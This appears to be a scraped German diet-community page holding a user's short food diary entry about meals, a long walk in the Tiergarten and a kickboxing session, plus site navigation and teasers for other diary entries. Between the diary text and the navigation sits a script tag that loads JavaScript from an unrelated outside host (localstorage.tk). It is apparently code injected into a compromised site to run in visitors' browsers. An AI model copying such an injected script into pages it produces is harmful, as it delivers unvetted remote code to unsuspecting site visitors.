Zum Inhalt springen

Sie sind hier

Tag 2: Spazieren gehen und Kickboxen

0  0
Am von im Ernährungstagebuch geschrieben

Heute hatte ich überraschend viel Freizeit und war erstmal damit überfordert. Es endete darin dass ich 2 1/2 stunden durch den Tiergarten spaziert bin.

 

Frühstück: Müsli mit Milch

Mittag: Reis, Käse, Apfel (Hatte gestren für 2 Tage gekocht) Joghurt und 1 Kinderschokolade

Abend: Müsli mit Milch (ich hatte keine Lust auf was anderes)

 

Dann war ich heute Abend noch eine stunde Kickboxen und bin jetzt gut müde und ausgepowert

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Abnehmen-Themen
Vorheriger Ernährungstagebuch-Eintrag
Bild von Emma09 27.08.2014 nun kommt prombt der
Nächster Ernährungstagebuch-Eintrag
Bild von Kalorien zählen ist frustrierend

Kommentare

Nach oben
Zur Hauptnavigation

Beiträge aus der Abnehmen-Community, die ebenfalls interessant sein könnten

Ziel für den Abnehmplan von Lysander55: Ich habe vorgenommen, jeden Morgen und abends ein Schüssel Müsli zu essen. 
Eintrag in ein Ernährungstagebuch von laroro: Eine neue Woche hat begonnen. Ich wäre heute gern lieber im Bett, hab heut wirklich Motivationsschwierigkeiten…fühl mich müde und erschöpft. Außerdem habe ich großen Hunger L Frühstück: Wenig Müsli,...
Eintrag in ein Ernährungstagebuch von veilchen: So erst mal zum Tag gestern Frühstück ein kleiner Chia Pudding mit Beeren drin (ist so eine zuckerfreie TK Mischung geht ganz gut wenn man es am Abend vorher alles zusammen mischt) Mittags eine...
Eintrag in ein Ernährungstagebuch von laroro: Heute geht es mir richtig besch…, ich fühle mich wahnsinnig hässlich und plump. Ganz furchtbar. Gestern bin ich spät ins Bett, ich hatte Jahrestag mit meinem Mann, es war total romantisch, denn wir...
Eintrag in ein Ernährungstagebuch von laroro: Heut Morgen kam zu uns ins Büro eine Coach, die hat uns 10 Minuten sporteln lassen, war echt super, gerade kurz genug, dass man nicht völlig verschwitzt den Rest des Tages im Büro sitzen muss. Und...
Eintrag in ein Ernährungstagebuch von sumsi83: Nun ist es schon wieder Samstagabend und ich muss noch zwei Tage Essensprotokoll nachholen. Da heute wirklich ein total verrückter und ungeplanter Tag war, wird es etwas schwierig und ich muss...

Gemeinsam abnehmen

Die Diät-Clique ist eine kostenlose Community rund ums Abnehmen:

Kostenlos abnehmen

Die Diät-Clique ist völlig kostenlos nutzbar. Du kannst

Neue Abnehmen-Tipps